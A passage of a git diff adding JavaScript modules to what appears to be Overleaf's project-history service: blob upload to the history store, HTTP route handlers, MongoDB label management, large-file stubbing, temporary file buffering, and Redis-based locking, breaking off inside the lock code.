`project-${projectId}-doc-${update.doc}-ranges`, + (err, rangesHash) => { + if (err) { + return callback(err) + } + logger.debug( + { fileHash, rangesHash }, + 'created blobs for both ranges and content' + ) + return callback(null, { file: fileHash, ranges: rangesHash }) + } + ) + } else { + logger.debug({ fileHash }, 'created blob for content') + return callback(null, { file: fileHash }) + } + } + ) + } else if ( + update.file != null && + (update.url != null || update.createdBlob) + ) { + const { fileId, filestoreURL } = _rewriteFilestoreUrl( + update.url, + projectId, + callback + ) + _checkBlobExists(historyId, update.hash, (err, blobExists) => { + if (err) { + return callback( + new OError( + 'error checking whether blob exists', + { projectId, historyId, update }, + err + ) + ) + } else if (blobExists) { + logger.debug( + { projectId, fileId, update }, + 'Skipping blob creation as it has already been created' + ) + return callback(null, { file: update.hash }) + } else if (update.createdBlob) { + logger.warn( + { projectId, fileId, update }, + 'created blob does not exist, reading from filestore' + ) + } + + if (!filestoreURL) { + return callback( + new OError('no filestore URL provided and blob was not created') + ) + } + if (!Settings.apis.filestore.enabled) { + return callback(new OError('blocking filestore read', { update })) + } + + fetchStream(filestoreURL, { + signal: AbortSignal.timeout(HTTP_REQUEST_TIMEOUT), + }) + .then(stream => { + LocalFileWriter.bufferOnDisk( + stream, + filestoreURL, + `project-${projectId}-file-${fileId}`, + (fsPath, cb) => { + _createBlob(historyId, fsPath, cb) + }, + (err, fileHash) => { + if (err) { + return callback(err) + } + if (update.hash && update.hash !== fileHash) { + logger.warn( + { projectId, fileId, webHash: update.hash, fileHash }, + 'hash mismatch between web and project-history' + ) + } + logger.debug({ fileHash }, 'created blob for file') + callback(null, { file: fileHash }) + } + ) + }) + .catch(err => { + if ( + err instanceof RequestFailedError && + err.response.status === 404 + ) { + logger.warn( + { projectId, historyId, filestoreURL }, + 'File contents not found in filestore. Storing in history as an empty file' + ) + const emptyStream = new StringStream() + LocalFileWriter.bufferOnDisk( + emptyStream, + filestoreURL, + `project-${projectId}-file-${fileId}`, + (fsPath, cb) => { + _createBlob(historyId, fsPath, cb) + }, + (err, fileHash) => { + if (err) { + return callback(err) + } + logger.debug({ fileHash }, 'created empty blob for file') + callback(null, { file: fileHash }) + } + ) + emptyStream.push(null) // send an EOF signal + } else { + callback(OError.tag(err, 'error from filestore', { filestoreURL })) + } + }) + }) + } else { + const error = new OError('invalid update for blob creation') + callback(error) + } +} + +function _createBlob(historyId, fsPath, _callback) { + const callback = _.once(_callback) + + HashManager._getBlobHash(fsPath, (error, hash, byteLength) => { + if (error) { + return callback(OError.tag(error)) + } + const outStream = fs.createReadStream(fsPath) + + logger.debug( + { fsPath, historyId, hash, byteLength }, + 'sending blob to history service' + ) + const url = `${Settings.overleaf.history.host}/projects/${historyId}/blobs/${hash}` + fetchNothing(url, { + method: 'PUT', + body: outStream, + headers: { 'Content-Length': byteLength }, // add the content length to work around problems with chunked encoding in node 18 + ...getHistoryFetchOptions(), + }) + .then(res => { + callback(null, hash) + }) + .catch(err => { + callback(OError.tag(err)) + }) + }) +} + +export function initializeProject(historyId, callback) { + _requestHistoryService( + { + method: 'POST', + path: 'projects', + json: historyId == null ? true : { projectId: historyId }, + }, + (error, project) => { + if (error) { + return callback(OError.tag(error)) + } + + const id = project.projectId + if (id == null) { + error = new OError('history store did not return a project id', id) + return callback(error) + } + + callback(null, id) + } + ) +} + +export function deleteProject(projectId, callback) { + _requestHistoryService( + { method: 'DELETE', path: `projects/${projectId}` }, + callback + ) +} + +const getProjectBlobAsync = promisify(getProjectBlob) + +class BlobStore { + constructor(projectId) { + this.projectId = projectId + } + + async getString(hash) { + return await getProjectBlobAsync(this.projectId, hash) + } + + async getObject(hash) { + const string = await this.getString(hash) + return JSON.parse(string) + } +} + +export function getBlobStore(projectId) { + return new BlobStore(projectId) +} + +function _requestOptions(options) { + const requestOptions = { + method: options.method || 'GET', + url: `${Settings.overleaf.history.host}/${options.path}`, + timeout: HTTP_REQUEST_TIMEOUT, + auth: { + user: Settings.overleaf.history.user, + pass: Settings.overleaf.history.pass, + sendImmediately: true, + }, + } + + if (options.json != null) { + requestOptions.json = options.json + } + + if (options.body != null) { + requestOptions.body = options.body + } + + if (options.qs != null) { + requestOptions.qs = options.qs + } + + return requestOptions +} + +/** + * @return {RequestInit} + */ +function getHistoryFetchOptions() { + return { + signal: AbortSignal.timeout(HTTP_REQUEST_TIMEOUT), + basicAuth: { + user: Settings.overleaf.history.user, + password: Settings.overleaf.history.pass, + }, + } +} + +function _requestHistoryService(options, callback) { + const requestOptions = _requestOptions(options) + request(requestOptions, (error, res, body) => { + if (error) { + return callback(OError.tag(error)) + } + + if (res.statusCode >= 200 && res.statusCode < 300) { + callback(null, body) + } else { + const { method, url, qs } = requestOptions + error = new OError( + `history store a non-success status code: ${res.statusCode}`, + { method, url, qs, statusCode: res.statusCode } + ) + callback(error) + } + }) +} + +export const promises = { + /** @type {(projectId: string, historyId: string) => Promise<{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}>} */ + getMostRecentChunk: promisify(getMostRecentChunk), + getChunkAtVersion: promisify(getChunkAtVersion), + getMostRecentVersion: promisifyMultiResult(getMostRecentVersion, [ + 'version', + 'projectStructureAndDocVersions', + 'lastChange', + 'mostRecentChunk', + ]), + getMostRecentVersionRaw: promisify(getMostRecentVersionRaw), + getProjectBlob: promisify(getProjectBlob), + getProjectBlobStream: promisify(getProjectBlobStream), + sendChanges: promisify(sendChanges), + createBlobForUpdate: promisify(createBlobForUpdate), + initializeProject: promisify(initializeProject), + deleteProject: promisify(deleteProject), +} diff --git a/services/project-history/app/js/HttpController.js b/services/project-history/app/js/HttpController.js new file mode 100644 index 0000000..9272487 --- /dev/null +++ b/services/project-history/app/js/HttpController.js @@ -0,0 +1,582 @@ +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import request from 'request' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as SummarizedUpdatesManager from './SummarizedUpdatesManager.js' +import * as DiffManager from './DiffManager.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as WebApiManager from './WebApiManager.js' +import * as SnapshotManager from './SnapshotManager.js' +import * as HealthChecker from './HealthChecker.js' +import * as SyncManager from './SyncManager.js' +import * as ErrorRecorder from './ErrorRecorder.js' +import * as RedisManager from './RedisManager.js' +import * as LabelsManager from './LabelsManager.js' +import * as HistoryApiManager from './HistoryApiManager.js' +import * as RetryManager from './RetryManager.js' +import * as FlushManager from './FlushManager.js' +import { pipeline } from 'node:stream' +import { RequestFailedError } from '@overleaf/fetch-utils' + +const ONE_DAY_IN_SECONDS = 24 * 60 * 60 + +export function getProjectBlob(req, res, next) { + const historyId = req.params.history_id + const blobHash = req.params.hash + HistoryStoreManager.getProjectBlobStream( + historyId, + blobHash, + (err, stream) => { + if (err != null) { + if (err instanceof RequestFailedError && err.response.status === 404) { + return res.status(404).end() + } + return next(OError.tag(err)) + } + res.setHeader('Cache-Control', `private, max-age=${ONE_DAY_IN_SECONDS}`) + pipeline(stream, res, err => { + if (err) next(err) + // res.end() is already called via 'end' event by pipeline. + }) + } + ) +} + +export function initializeProject(req, res, next) { + const { historyId } = req.body + HistoryStoreManager.initializeProject(historyId, (error, id) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ project: { id } }) + }) +} + +export function flushProject(req, res, next) { + const projectId = req.params.project_id + if (req.query.debug) { + logger.debug( + { projectId }, + 'compressing project history in single-step mode' + ) + UpdatesProcessor.processSingleUpdateForProject(projectId, error => { + if (error != null) { + return next(OError.tag(error)) + } + res.sendStatus(204) + }) + } else if (req.query.bisect) { + logger.debug({ projectId }, 'compressing project history in bisect mode') + UpdatesProcessor.processUpdatesForProjectUsingBisect( + projectId, + UpdatesProcessor.REDIS_READ_BATCH_SIZE, + error => { + if (error != null) { + return next(OError.tag(error)) + } + res.sendStatus(204) + } + ) + } else { + logger.debug({ projectId }, 'compressing project history') + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(OError.tag(error)) + } + res.sendStatus(204) + }) + } +} + +export function dumpProject(req, res, next) { + const projectId = req.params.project_id + const batchSize = req.query.count || UpdatesProcessor.REDIS_READ_BATCH_SIZE + logger.debug({ projectId }, 'retrieving raw updates') + UpdatesProcessor.getRawUpdates(projectId, batchSize, (error, rawUpdates) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json(rawUpdates) + }) +} + +export function flushOld(req, res, next) { + const { maxAge, queueDelay, limit, timeout, background } = req.query + const options = { maxAge, queueDelay, limit, timeout, background } + FlushManager.flushOldOps(options, (error, results) => { + if (error != null) { + return next(OError.tag(error)) + } + res.send(results) + }) +} + +export function getDiff(req, res, next) { + const projectId = req.params.project_id + const { pathname, from, to } = req.query + if (pathname == null) { + return res.sendStatus(400) + } + + logger.debug({ projectId, pathname, from, to }, 'getting diff') + DiffManager.getDiff(projectId, pathname, from, to, (error, diff) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ diff }) + }) +} + +export function getFileTreeDiff(req, res, next) { + const projectId = req.params.project_id + const { to, from } = req.query + + DiffManager.getFileTreeDiff(projectId, from, to, (error, diff) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ diff }) + }) +} + +export function getUpdates(req, res, next) { + const projectId = req.params.project_id + const { before, min_count: minCount } = req.query + SummarizedUpdatesManager.getSummarizedProjectUpdates( + projectId, + { before, min_count: minCount }, + (error, updates, nextBeforeTimestamp) => { + if (error != null) { + return next(OError.tag(error)) + } + for (const update of updates) { + // Sets don't JSONify, so convert to arrays + update.pathnames = Array.from(update.pathnames || []).sort() + } + res.json({ + updates, + nextBeforeTimestamp, + }) + } + ) +} + +export function latestVersion(req, res, next) { + const projectId = req.params.project_id + logger.debug({ projectId }, 'compressing project history and getting version') + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(OError.tag(error)) + } + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error != null) { + return next(OError.tag(error)) + } + HistoryStoreManager.getMostRecentVersion( + projectId, + historyId, + (error, version, projectStructureAndDocVersions, lastChange) => { + if (error != null) { + return next(OError.tag(error)) + } + res.json({ + version, + timestamp: lastChange != null ? lastChange.timestamp : undefined, + v2Authors: lastChange != null ? lastChange.v2Authors : undefined, + }) + } + ) + }) + }) +} + +export function getFileSnapshot(req, res, next) { + const { project_id: projectId, version, pathname } = req.params + SnapshotManager.getFileSnapshotStream( + projectId, + version, + pathname, + (error, stream) => { + if (error != null) { + return next(OError.tag(error)) + } + pipeline(stream, res, err => { + if (err) next(err) + // res.end() is already called via 'end' event by pipeline. + }) + } + ) +} + +export function getRangesSnapshot(req, res, next) { + const { project_id: projectId, version, pathname } = req.params + SnapshotManager.getRangesSnapshot( + projectId, + version, + pathname, + (err, ranges) => { + if (err) { + return next(OError.tag(err)) + } + res.json(ranges) + } + ) +} + +export function getFileMetadataSnapshot(req, res, next) { + const { project_id: projectId, version, pathname } = req.params + SnapshotManager.getFileMetadataSnapshot( + projectId, + version, + pathname, + (err, data) => { + if (err) { + return next(OError.tag(err)) + } + res.json(data) + } + ) +} + +export function getLatestSnapshot(req, res, next) { + const { project_id: projectId } = req.params + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error) return next(OError.tag(error)) + SnapshotManager.getLatestSnapshot( + projectId, + historyId, + (error, details) => { + if (error != null) { + return next(error) + } + const { snapshot, version } = details + res.json({ snapshot: snapshot.toRaw(), version }) + } + ) + }) +} + +export function getChangesInChunkSince(req, res, next) { + const { project_id: projectId } = req.params + const { since } = req.query + WebApiManager.getHistoryId(projectId, (error, historyId) => { + if (error) return next(OError.tag(error)) + SnapshotManager.getChangesInChunkSince( + projectId, + historyId, + since, + (error, details) => { + if (error != null) { + return next(error) + } + const { latestStartVersion, changes } = details + res.json({ + latestStartVersion, + changes: changes.map(c => c.toRaw()), + }) + } + ) + }) +} + +export function getProjectSnapshot(req, res, next) { + const { project_id: projectId, version } = req.params + SnapshotManager.getProjectSnapshot( + projectId, + version, + (error, snapshotData) => { + if (error != null) { + return next(error) + } + res.json(snapshotData) + } + ) +} + +export function getPathsAtVersion(req, res, next) { + const { project_id: projectId, version } = req.params + SnapshotManager.getPathsAtVersion(projectId, version, (error, result) => { + if (error != null) { + return next(error) + } + res.json(result) + }) +} + +export function healthCheck(req, res) { + HealthChecker.check(err => { + if (err != null) { + logger.err({ err }, 'error performing health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} + +export function checkLock(req, res) { + HealthChecker.checkLock(err => { + if (err != null) { + logger.err({ err }, 'error performing lock check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} + +export function resyncProject(req, res, next) { + const projectId = req.params.project_id + const options = {} + if (req.body.origin) { + options.origin = req.body.origin + } + if (req.body.historyRangesMigration) { + options.historyRangesMigration = req.body.historyRangesMigration + } + if (req.query.force || req.body.force) { + // this will delete the queue and clear the sync state + // use if the project is completely broken + SyncManager.startHardResync(projectId, options, error => { + if (error != null) { + return next(error) + } + // flush the sync operations + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) + }) + } else { + SyncManager.startResync(projectId, options, error => { + if (error != null) { + return next(error) + } + // flush the sync operations + UpdatesProcessor.processUpdatesForProject(projectId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) + }) + } +} + +export function forceDebugProject(req, res, next) { + const projectId = req.params.project_id + // set the debug flag to true unless we see ?clear=true + const state = !req.query.clear + ErrorRecorder.setForceDebug(projectId, state, error => { + if (error != null) { + return next(error) + } + // display the failure record to help debugging + ErrorRecorder.getFailureRecord(projectId, (error, result) => { + if (error != null) { + return next(error) + } + res.send(result) + }) + }) +} + +export function getFailures(req, res, next) { + ErrorRecorder.getFailures((error, result) => { + if (error != null) { + return next(error) + } + res.send({ failures: result }) + }) +} + +export function getQueueCounts(req, res, next) { + RedisManager.getProjectIdsWithHistoryOpsCount((err, queuedProjectsCount) => { + if (err != null) { + return next(err) + } + res.send({ queuedProjects: queuedProjectsCount }) + }) +} + +export function getLabels(req, res, next) { + const projectId = req.params.project_id + HistoryApiManager.shouldUseProjectHistory( + projectId, + (error, shouldUseProjectHistory) => { + if (error != null) { + return next(error) + } + if (shouldUseProjectHistory) { + LabelsManager.getLabels(projectId, (error, labels) => { + if (error != null) { + return next(error) + } + res.json(labels) + }) + } else { + res.sendStatus(409) + } + } + ) +} + +export function createLabel(req, res, next) { + const { project_id: projectId, user_id: userIdParam } = req.params + const { + version, + comment, + user_id: userIdBody, + created_at: createdAt, + validate_exists: validateExists, + } = req.body + + // Temporarily looking up both params and body while rolling out changes + // in the router path - https://github.com/overleaf/internal/pull/20200 + const userId = userIdParam || userIdBody + + HistoryApiManager.shouldUseProjectHistory( + projectId, + (error, shouldUseProjectHistory) => { + if (error != null) { + return next(error) + } + if (shouldUseProjectHistory) { + LabelsManager.createLabel( + projectId, + userId, + version, + comment, + createdAt, + validateExists, + (error, label) => { + if (error != null) { + return next(error) + } + res.json(label) + } + ) + } else { + logger.error( + { + projectId, + userId, + version, + comment, + createdAt, + validateExists, + }, + 'not using v2 history' + ) + res.sendStatus(409) + } + } + ) +} + +/** + * This will delete a label if it is owned by the current user. If you wish to + * delete a label regardless of the current user, then use `deleteLabel` instead. + */ +export function deleteLabelForUser(req, res, next) { + const { + project_id: projectId, + user_id: userId, + label_id: labelId, + } = req.params + + LabelsManager.deleteLabelForUser(projectId, userId, labelId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) +} + +export function deleteLabel(req, res, next) { + const { project_id: projectId, label_id: labelId } = req.params + + LabelsManager.deleteLabel(projectId, labelId, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) +} + +export function retryFailures(req, res, next) { + const { failureType, timeout, limit, callbackUrl } = req.query + if (callbackUrl) { + // send response but run in background when callbackUrl provided + res.send({ retryStatus: 'running retryFailures in background' }) + } + RetryManager.retryFailures( + { failureType, timeout, limit }, + (error, result) => { + if (callbackUrl) { + // if present, notify the callbackUrl on success + if (!error) { + // Needs Node 12 + // const callbackHeaders = Object.fromEntries(Object.entries(req.headers || {}).filter(([k,v]) => k.match(/^X-CALLBACK-/i))) + const callbackHeaders = {} + for (const key of Object.getOwnPropertyNames( + req.headers || {} + ).filter(key => key.match(/^X-CALLBACK-/i))) { + const found = key.match(/^X-CALLBACK-(.*)/i) + callbackHeaders[found[1]] = req.headers[key] + } + request({ url: callbackUrl, headers: callbackHeaders }) + } + } else { + if (error != null) { + return next(error) + } + res.send({ retryStatus: result }) + } + } + ) +} + +export function transferLabels(req, res, next) { + const { from_user: fromUser, to_user: toUser } = req.params + LabelsManager.transferLabels(fromUser, toUser, error => { + if (error != null) { + return next(error) + } + res.sendStatus(204) + }) +} + +export function deleteProject(req, res, next) { + const { project_id: projectId } = req.params + // clear the timestamp before clearing the queue, + // because the queue location is used in the migration + RedisManager.clearFirstOpTimestamp(projectId, err => { + if (err) { + return next(err) + } + RedisManager.clearCachedHistoryId(projectId, err => { + if (err) { + return next(err) + } + RedisManager.destroyDocUpdatesQueue(projectId, err => { + if (err) { + return next(err) + } + SyncManager.clearResyncState(projectId, err => { + if (err) { + return next(err) + } + ErrorRecorder.clearError(projectId, err => { + if (err) { + return next(err) + } + res.sendStatus(204) + }) + }) + }) + }) + }) +} diff --git a/services/project-history/app/js/LabelsManager.js b/services/project-history/app/js/LabelsManager.js new file mode 100644 index 0000000..fe3dd4e --- /dev/null +++ b/services/project-history/app/js/LabelsManager.js @@ -0,0 +1,175 @@ +import OError from '@overleaf/o-error' +import { db, ObjectId } from './mongodb.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as WebApiManager from './WebApiManager.js' + +export function getLabels(projectId, callback) { + _toObjectId(projectId, function (error, projectId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels + .find({ project_id: new ObjectId(projectId) }) + .toArray(function (error, labels) { + if (error) { + return callback(OError.tag(error)) + } + const formattedLabels = labels.map(_formatLabel) + callback(null, formattedLabels) + }) + }) +} + +export function createLabel( + projectId, + userId, + version, + comment, + createdAt, + shouldValidateExists, + callback +) { + const validateVersionExists = function (callback) { + if (shouldValidateExists === false) { + callback() + } else { + _validateChunkExistsForVersion(projectId.toString(), version, callback) + } + } + + _toObjectId(projectId, userId, function (error, projectId, userId) { + if (error) { + return callback(OError.tag(error)) + } + validateVersionExists(function (error) { + if (error) { + return callback(OError.tag(error)) + } + + createdAt = createdAt != null ? new Date(createdAt) : new Date() + + const label = { + project_id: new ObjectId(projectId), + comment, + version, + created_at: createdAt, + } + if (userId) { + label.user_id = userId + } + db.projectHistoryLabels.insertOne(label, function (error, confirmation) { + if (error) { + return callback(OError.tag(error)) + } + label._id = confirmation.insertedId + callback(null, _formatLabel(label)) + }) + }) + }) +} + +export function deleteLabelForUser(projectId, userId, labelId, callback) { + _toObjectId( + projectId, + userId, + labelId, + function (error, projectId, userId, labelId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels.deleteOne( + { + _id: new ObjectId(labelId), + project_id: new ObjectId(projectId), + user_id: new ObjectId(userId), + }, + callback + ) + } + ) +} + +export function deleteLabel(projectId, labelId, callback) { + _toObjectId(projectId, labelId, function (error, projectId, labelId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels.deleteOne( + { + _id: new ObjectId(labelId), + project_id: new ObjectId(projectId), + }, + callback + ) + }) +} + +export function transferLabels(fromUserId, toUserId, callback) { + _toObjectId(fromUserId, toUserId, function (error, fromUserId, toUserId) { + if (error) { + return callback(OError.tag(error)) + } + db.projectHistoryLabels.updateMany( + { + user_id: fromUserId, + }, + { + $set: { user_id: toUserId }, + }, + callback + ) + }) +} + +function _toObjectId(...args1) { + const adjustedLength = Math.max(args1.length, 1) + const args = args1.slice(0, adjustedLength - 1) + const callback = args1[adjustedLength - 1] + try { + const ids = args.map(id => { + if (id) { + return new ObjectId(id) + } else { + return undefined + } + }) + callback(null, ...ids) + } catch (error) { + callback(error) + } +} + +function _formatLabel(label) { + return { + id: label._id, + comment: label.comment, + version: label.version, + user_id: label.user_id, + created_at: label.created_at, + } +} + +function _validateChunkExistsForVersion(projectId, version, callback) { + UpdatesProcessor.processUpdatesForProject(projectId, function (error) { + if (error) { + return callback(error) + } + WebApiManager.getHistoryId(projectId, function (error, historyId) { + if (error) { + return callback(error) + } + HistoryStoreManager.getChunkAtVersion( + projectId, + historyId, + version, + function (error) { + if (error) { + return callback(error) + } + callback() + } + ) + }) + }) +} diff --git a/services/project-history/app/js/LargeFileManager.js b/services/project-history/app/js/LargeFileManager.js new file mode 100644 index 0000000..dfdc994 --- /dev/null +++ b/services/project-history/app/js/LargeFileManager.js @@ -0,0 +1,88 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import fs from 'node:fs' +import { randomUUID } from 'node:crypto' +import Path from 'node:path' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import _ from 'lodash' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as HashManager from './HashManager.js' + +export function createStub(fsPath, fileId, fileSize, fileHash, callback) { + if (callback == null) { + callback = function () {} + } + callback = _.once(callback) + const newFsPath = Path.join( + Settings.path.uploadFolder, + randomUUID() + `-${fileId}-stub` + ) + const writeStream = fs.createWriteStream(newFsPath) + writeStream.on('error', function (error) { + OError.tag(error, 'error writing stub file', { fsPath, newFsPath }) + return fs.unlink(newFsPath, () => callback(error)) + }) + writeStream.on('finish', function () { + logger.debug( + { fsPath, fileId, fileSize, fileHash }, + 'replaced large file with stub' + ) + return callback(null, newFsPath) + }) // let the consumer unlink the file + const stubLines = [ + 'FileTooLargeError v1', + 'File too large to be stored in history service', + `id ${fileId}`, + `size ${fileSize} bytes`, + `hash ${fileHash}`, + '\0', // null byte to make this a binary file + ] + writeStream.write(stubLines.join('\n')) + return writeStream.end() +} + +export function replaceWithStubIfNeeded(fsPath, fileId, fileSize, callback) { + if (callback == null) { + callback = function () {} + } + if ( + Settings.maxFileSizeInBytes != null && + fileSize > Settings.maxFileSizeInBytes + ) { + logger.error( + { fsPath, fileId, maxFileSizeInBytes: Settings.maxFileSizeInBytes }, + 'file too large, will use stub' + ) + return HashManager._getBlobHash(fsPath, function (error, fileHash) { + if (error != null) { + return callback(error) + } + return createStub( + fsPath, + fileId, + fileSize, + fileHash, + function (error, newFsPath) { + if (error != null) { + return callback(error) + } + return callback(null, newFsPath) + } + ) + }) + } else { + return callback(null, fsPath) + } +} diff --git a/services/project-history/app/js/LocalFileWriter.js b/services/project-history/app/js/LocalFileWriter.js new file mode 100644 index 0000000..3629a55 --- /dev/null +++ b/services/project-history/app/js/LocalFileWriter.js @@ -0,0 +1,114 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import fs from 'node:fs' +import { pipeline } from 'node:stream' +import { randomUUID } from 'node:crypto' +import path from 'node:path' +import _ from 'lodash' +import logger from '@overleaf/logger' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import * as LargeFileManager from './LargeFileManager.js' + +// +// This method takes a stream and provides you a new stream which is now +// reading from disk. +// +// This is useful if we're piping one network stream to another. If the stream +// we're piping to can't consume data as quickly as the one we're consuming +// from then large quantities of data may be held in memory. Instead the read +// stream can be passed to this method, the data will then be held on disk +// rather than in memory and will be cleaned up once it has been consumed. +// +export function bufferOnDisk( + inStream, + url, + fileId, + consumeOutStream, + callback +) { + const timer = new metrics.Timer('LocalFileWriter.writeStream') + + const fsPath = path.join( + Settings.path.uploadFolder, + randomUUID() + `-${fileId}` + ) + + const cleanup = _.once((streamError, res) => { + return deleteFile(fsPath, function (cleanupError) { + if (streamError) { + OError.tag(streamError, 'error deleting temporary file', { + fsPath, + url, + }) + } + if (cleanupError) { + OError.tag(cleanupError) + } + if (streamError && cleanupError) { + // logging the cleanup error in case only the stream error is sent to the callback + logger.error(cleanupError) + } + return callback(streamError || cleanupError, res) + }) + }) + + logger.debug({ fsPath, url }, 'writing file locally') + + const writeStream = fs.createWriteStream(fsPath) + pipeline(inStream, writeStream, err => { + if (err) { + OError.tag(err, 'problem writing file locally', { + fsPath, + url, + }) + return cleanup(err) + } + timer.done() + // in future check inStream.response.headers for hash value here + logger.debug({ fsPath, url }, 'stream closed after writing file locally') + const fileSize = writeStream.bytesWritten + return LargeFileManager.replaceWithStubIfNeeded( + fsPath, + fileId, + fileSize, + function (err, newFsPath) { + if (err != null) { + OError.tag(err, 'problem in large file manager', { + newFsPath, + fsPath, + fileId, + fileSize, + }) + return cleanup(err) + } + return consumeOutStream(newFsPath, cleanup) + } + ) + }) +} + +export function deleteFile(fsPath, callback) { + if (fsPath == null || fsPath === '') { + return callback() + } + logger.debug({ fsPath }, 'removing local temp file') + return fs.unlink(fsPath, function (err) { + if (err != null && err.code !== 'ENOENT') { + // ignore errors deleting the file when it was never created + return callback(OError.tag(err)) + } else { + return callback() + } + }) +} diff --git a/services/project-history/app/js/LockManager.js b/services/project-history/app/js/LockManager.js new file mode 100644 index 0000000..088111b --- /dev/null +++ b/services/project-history/app/js/LockManager.js @@ -0,0 +1,314 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +import { promisify } from 'node:util' +import async from 'async' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import redis from '@overleaf/redis-wrapper' +import os from 'node:os' +import crypto from 'node:crypto' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' + +const LOCK_TEST_INTERVAL = 50 // 50ms between each test of the lock +const MAX_LOCK_WAIT_TIME = 10000 // 10s maximum time to spend trying to get the lock +export const LOCK_TTL = 360 // seconds +export const MIN_LOCK_EXTENSION_INTERVAL = 1000 // 1s minimum interval when extending a lock + +export const UNLOCK_SCRIPT = + 'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("del", KEYS[1]) else return 0 end' +const EXTEND_SCRIPT = + 'if redis.call("get", KEYS[1]) == ARGV[1] then return redis.call("expire", KEYS[1], ARGV[2]) else return 0 end' + +const HOST = os.hostname() +const PID = process.pid +const RND = crypto.randomBytes(4).toString('hex') +let COUNT = 0 + +const rclient = redis.createClient(Settings.redis.lock) + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +// Use a signed lock value as described in +// http://redis.io/topics/distlock#correct-implementation-with-a-single-instance +// to prevent accidental unlocking by multiple processes +_mocks.randomLock = () => { + const time = Date.now() + return `locked:host=${HOST}:pid=${PID}:random=${RND}:time=${time}:count=${COUNT++}` +} + +export function randomLock(...args) { + return _mocks.randomLock(...args) +} + +_mocks.tryLock = (key, callback) => { + if (callback == null) { + callback = function () {} + } + const lockValue = randomLock() + return rclient.set( + key, + lockValue, + 'EX', + LOCK_TTL, + 'NX', + function (err, gotLock) { + if (err != null) { + return callback( + OError.tag(err, 'redis error trying to get lock', { key }) + ) + } + if (gotLock === 'OK') { + metrics.inc('lock.project.try.success') + return callback(err, true, lockValue) + } else { + metrics.inc('lock.project.try.failed') + return callback(err, false) + } + } + ) +} + +export function tryLock(...args) { + _mocks.tryLock(...args) +} + +_mocks.extendLock = (key, lockValue, callback) => { + if (callback == null) { + callback = function () {} + } + return rclient.eval( + EXTEND_SCRIPT, + 1, + key, + lockValue, + LOCK_TTL, + function (err, result) { + if (err != null) { + return callback( + OError.tag(err, 'redis error trying to extend lock', { key }) + ) + } + + if (result != null && result !== 1) { + // successful extension should release exactly one key + metrics.inc('lock.project.extend.failed') + const error = new OError('failed to extend lock', { + key, + lockValue, + result, + }) + return callback(error) + } + + metrics.inc('lock.project.extend.success') + return callback() + } + ) +} + +export function extendLock(...args) { + _mocks.extendLock(...args) +} + +_mocks.getLock = (key, callback) => { + let attempt + if (callback == null) { + callback = function () {} + } + const startTime = Date.now() + let attempts = 0 + return (attempt = function () { + if (Date.now() - startTime > MAX_LOCK_WAIT_TIME) { + metrics.inc('lock.project.get.failed') + return callback(new OError('Timeout', { key })) + } + + attempts += 1 + return tryLock(key, function (error, gotLock, lockValue) { + if (error != null) { + return callback(OError.tag(error)) + } + if (gotLock) { + metrics.gauge('lock.project.get.success.tries', attempts) + return callback(null, lockValue) + } else { + return setTimeout(attempt, LOCK_TEST_INTERVAL) + } + }) + })() +} + +export function getLock(...args) { + _mocks.getLock(...args) +} + +export function checkLock(key, callback) { + if (callback == null) { + callback = function () {} + } + return rclient.exists(key, function (err, exists) { + if (err != null) { + return callback(OError.tag(err)) + } + exists = parseInt(exists) + if (exists === 1) { + return callback(err, false) + } else { + return callback(err, true) + } + }) +} + +_mocks.releaseLock = (key, lockValue, callback) => { + return rclient.eval(UNLOCK_SCRIPT, 1, key, lockValue, function (err, result) { + if (err != null) { + return callback(OError.tag(err)) + } + if (result != null && result !== 1) { + // successful unlock should release exactly one key + const error = new OError('tried to release timed out lock', { + key, + 